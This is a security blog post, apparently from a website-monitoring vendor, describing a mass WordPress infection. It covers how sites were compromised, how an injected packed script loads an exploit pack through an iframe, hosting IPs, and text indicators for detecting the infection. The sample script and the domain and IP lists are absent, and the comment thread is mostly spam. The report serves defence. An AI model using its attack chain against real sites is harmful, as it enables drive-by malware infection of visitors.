Mass WordPress infection ongoing--most malicious domains using

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)
To peer researchers: As we all know, researching security incidents take a lot of time and sacrifice; as if they know exactly how to make our lives harder, attackers often launch right before the weekend or a long vacation. In such an event, we often need to sacrifice our personal plans to be with our families, in order to research and publish threats fast enough.

In the past, usually right after we publish our blog and tweet the link, some other security blogs will very quickly put out a post regarding the same incident. Usually there will be a link to our original post, and we appreciate this very much.

However, recently, for some of our posts, we feel our contents were plainly copied and there was no credit linking to us. We sincerely hope this won't happen.

Together as a security community, we have a common goal--to make the Internet a safer place for everyone. It's an honor to be a part of this community, and we have a lot of respect for everyone involved. We just don't like the feeling of being taken advantage of. Thanks very much everyone!

We've been tracking an ongoing mass WordPress infection that began to take place around Oct 5th, as detected by our HackAlert Website monitoring service. Many Wordpress sites have been hit. Using as an example, we've created a video showing how an affected WordPress site can infect its visitors.

1. Location of injected script: in the index page of the compromised website.
2. Means of compromise: we believe via a combination of a) stolen WordPress passwords b) backdoors into previously compromised WordPress websites and c) Automated script-injection tools that work in combination of either (a) or (b).
3. Injected script: In the [Details] section we've included an example of an injected script. There are more than 20 variations.
4. Script packer used: Dean Edwards' packer.
5. Malware: Multiple malware will be installed (dropped) onto the visitors machines without the users' knowledge. Antivirus detection rate is around 5 out of 43 vendors on VirusTotal at the time of this writing.
6. Infected websites: A lot of WordPress websites have been hit, a sample list is as follows:

7. Malicous domains: This time, instead of owning the malicious domains themselves, the attackers are using mostly the dynamic DNS service provided by A sample list is as follows:

8. Malicous domains: Although all of the above domains were resolving through, there are only a few IPs used so far, including the following:

1. (Primary IP, AS12695, Russian Federation Moscow Digital Networks Cjsc)
2. (AS25847, United States New York Smv)
3. (AS18229, India Hyderabad IP Pool For Znet)

9. Exploit pack: *NOT* BlackHole, still analyzing

10. Is your WordPress infected? A very simple way is to check for the existence of the following text: a) showthread b) 72241732 c) 72291731 and if these exist, have a closer look. You can also use the HackAlert Website monitoring service to have your site monitored 24x7.


The injection has a simple chain:

1. Index page of a WordPress site is injected with script packed by Dean Edwards' packer
2. Javascript generates iframe to a malicious domain registered with
3. Browser loads the exploit pack from the malicious domain, hosting on a few fixed IPs including (Russia), (USA), and (India).

Below is an example of an injected script:

Depending on the browsing platform used, several malicious binaries are dropped upon successful exploitation. At the time of this writing, the antivirus detection rate is 5 out of 43 vendors on VirusTotal:


Julien said...

You have saved my lige guy!!!

Scumlabs said...

How do we fix it?..

GaiaLogic said...

While it's fantastic that I now know what it is and what it does, how about telling us all hot to locate and remove it? I see a lot of people out there talking about this, but no one seems to be able to tell us noobs how to deal with it.
This is why these things continue to happen on a massive scale, it takes us months to find an effective solution because all the people discussing it either think we all should know how to deal with it or just can't be bothered to explain it!
Tell people how to fix these things, then maybe we wouldn't be seeing all these.

Then again, maybe it serves some that millions of people don't know?

Andrew said...

This exploit's php contents are here:
They seem to like to use timthumb.php as a method for injecting their code (most likely other known exploits as well), so make sure you have the newest version of that file as well as all the security updates installed!

JF Agno said...

I'm one of the infected in the list, but i think i have removed it how should i know if i'm still infected?

viagra said...

Nice information, I really appreciate the way you presented.Thanks for sharing

elnaser said...

شركة الصفرات لتسليك المجارى بالرياض
شركة الصفرات لتنظيف الخزانات بالرياض
شركة الصفرات لعزل الخزانات بالرياض
شركة الصفرات لرش المبيدات
شركة الصفرات لمكافحة الحشرات بالرياض

Abedo Ahmed said...

تسليك مجارى بالدمام

شركة تسليك مجارى بجازان

شركة تسليك مجارى بابها

شركة نقل عفش بالرياض

شركة نقل عفش بخميس مشيط

شركة كشف تسربات المياه بجازان

شركة كشف تسربات المياه بخميس مشيط

شركة كشف تسربات المياه بابها

شركة كشف تسربات المياه بالدمام

شركة كشف تسربات المياه بالرياض

شركة نقل اثاث بجازان

abdo mahmoud said...

افضل شركة تسليك مجارى بالباحة
شركة شفط بيارات بالباحة
شركة تنظيف منازل بالباحة
شركة مكافحة حشرات بخميس مشيط
شركة كشف تسربات بابها
شركة تنظيف خزانات بابها
شركة كشف تسربات المياه بابها
شركة تنظيف منازل بالقنفذة
شركة مكافحة حشرات بالباحة
شركة تنظيف بالباحة
شركة تنظيف خزانات بالباحة
شركة تنظيف بالقنفذة

Cleaning services said...

حيث أن النظافة افضل شركة تنظيف بالرياض
هي عنوان بيتك ونظافتها تدل عليك لذلك يهتم العملاء بنظافتها
وغسيلها بشكل دوري لكن ذلك يحتاج إلي شركة متخصصة حتي تتم النظافة علي أكمل وجة.
نستخدم في شركة ماكينات تنظيف تحافظ علي القماش الخارجي للمجلس
وتجعلة يبدو كالجديد تماما لأنها تعمل علي ضخ المياه وشفط
ولذلك عمليات الشفط امر مهم لان مع الشفط يتم سحب الاوساخ والاتربه
ارخص شركة تنظيف
افضل شركات تنظيف بالرياض
شركات تنظيف بالرياض
تنظيف فى الرياض
تنظيف بالرياض
شركة تنظيف منازل بالرياض
تنظيف خزانات بالرياض
شركة تنظيف المنازل بالرياض
تنظيف منازل فى الرياض
تنظيف منازل
غسيل خزانات بالرياض

afaf elgamal said...

شركة تنظيف خزانات بالرياض مع العزل والتعقيم
شركة عزل خزانات بالرياض
شركة مكافحة حشرات بالرياض
شركة كشف تسربات يالرياض
شركة تنظيف فلل بالرياض
شركة رش مبيد بالرياض
شركة نقل اثاث بالرياض
شركة تنظيف وصيانة مكيفات بالرياض
شركة تنظيف مجالس بالرياض
شركة تنظيف موكيت بالرياض

afaf elgamal said...

شركة تنظيف فلل بأبها
شركة تنظيف شقق بابها

شركة تنظيف منازل بأبها
شركة تنظيف مجالس بابها
شركة ننظيف موكيت بأبها
شركة تنظيف خزانات بأبها
شركةتنظيف منازل بخميس مشيط
شركة تنظيف فلل بخميس مشيط
شركة مكافحة حشرات بأبها
شركة عزل أسطح بأبها

Post a Comment